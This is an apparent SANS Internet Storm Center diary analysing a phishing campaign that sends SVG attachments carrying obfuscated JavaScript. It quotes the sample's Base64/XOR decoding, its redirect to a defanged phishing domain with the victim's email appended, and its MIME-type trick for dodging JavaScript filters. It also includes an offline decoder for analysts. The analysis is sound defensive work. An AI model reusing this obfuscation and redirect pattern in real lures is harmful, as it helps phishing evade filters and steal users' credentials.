For a few days, my SANS ISC mailbox has been flooded with emails that deliver SVG files. An SVG ("Scalable Vector Graphics") is a web-friendly vector file format used for graphics and icons. No URL in the body, just “an image”: that’s the perfect way to deliver some malicious content. This isn’t the first time that we have seen this technique used by threat actors[1].

This time, the SVG files are really simple and don’t even contain any graphical element, only a simple piece of JavaScript that redirects the victim's browser to the phishing page.

With the current wave, I just detected regular phishing pages but it could be any payload.

The variable “nl” contains the targeted email address:

nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // “handlers@sans.edu”

The interesting payload is in “oa”: it contains a Base64-encoded and XOR’d string. The XOR key is in “bd”:

const pt = "b19208caeefa";
const rm = "51d1e7dcd384";
const bd = pt + rm;

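The payload is decoded here. The array lookup spells “atob”, so “kf” is the browser's Base64 decoder, and each decoded character is then XOR'd with the key: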

const cx = ['b', 'style', 'o', 't', 'a'];
const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')];
const ts = kf(oa);
const rabbit = Uint8Array.from(ts, (aa, ak) =>
    aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length)
);

Finally, the variable “rabbit” is used to perform the redirect in the browser:

window.location.href = "hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/" + "handlers@sans.edu";
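
For analysts who want the redirect target without opening the attachment in a browser, the decoding described above can be reproduced offline. This is an added example for Node.js, not code from the sample or from the original diary: the function names and SAMPLE_OA (a constructed payload, since the real “oa” value is not shown here) are assumptions, as is treating the leading “$” of “nl” as a marker to strip.

```javascript
"use strict";
// Added example (Node.js). Function names and SAMPLE_OA are assumptions;
// the key halves and the "nl" value are the ones quoted in the diary.
const KEY = "b19208caeefa" + "51d1e7dcd384"; // bd = pt + rm
const NL = "$aGFuZGxlcnNAc2Fucy5lZHU=";

// Constructed sample, not from the campaign: "https://example.invalid/"
// XOR'd with KEY and Base64-encoded, standing in for the real "oa" value.
const SAMPLE_OA = "CkVNQkMCTE4AHQcMRV0BHwxZEgIIWlwb";

// Strict Base64 decode: Buffer.from() does not throw on malformed input,
// so reject anything that is not well-formed before decoding.
function b64ToBytes(text) {
  if (text.length % 4 !== 0 || !/^[A-Za-z0-9+/]*={0,2}$/.test(text)) {
    throw new Error("not well-formed Base64");
  }
  return Buffer.from(text, "base64");
}

// "nl": assumed here to be Base64 behind a leading "$" marker.
function decodeTarget(nl) {
  return b64ToBytes(nl.replace(/^\$/, "")).toString("utf8");
}

// "oa": Base64-decode, then XOR every byte with the repeating key,
// mirroring aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length).
function decodePayload(oa, key) {
  if (!key) throw new Error("empty XOR key");
  const raw = b64ToBytes(oa);
  const out = Buffer.alloc(raw.length);
  for (let i = 0; i < raw.length; i++) {
    out[i] = raw[i] ^ key.charCodeAt(i % key.length);
  }
  return out.toString("latin1");
}

// Defang a decoded URL before it goes into a ticket or a blocklist request.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

console.log(decodeTarget(NL));
console.log(defang(decodePayload(SAMPLE_OA, KEY)));
```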

This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used (".cfd"), which means "Clothing, Fashion, and Design". It's a cheap TLD that is more and more abused in phishing campaigns[2].

A final note about the MIME type used in the SVG file: 

<script type="application/ecmascript">

This is an official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[3]. It was probably used to defeat some common security controls that look for "JavaScript".

[1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456
[2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d
[3] https://github.com/sudheerj/ECMAScript-features

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.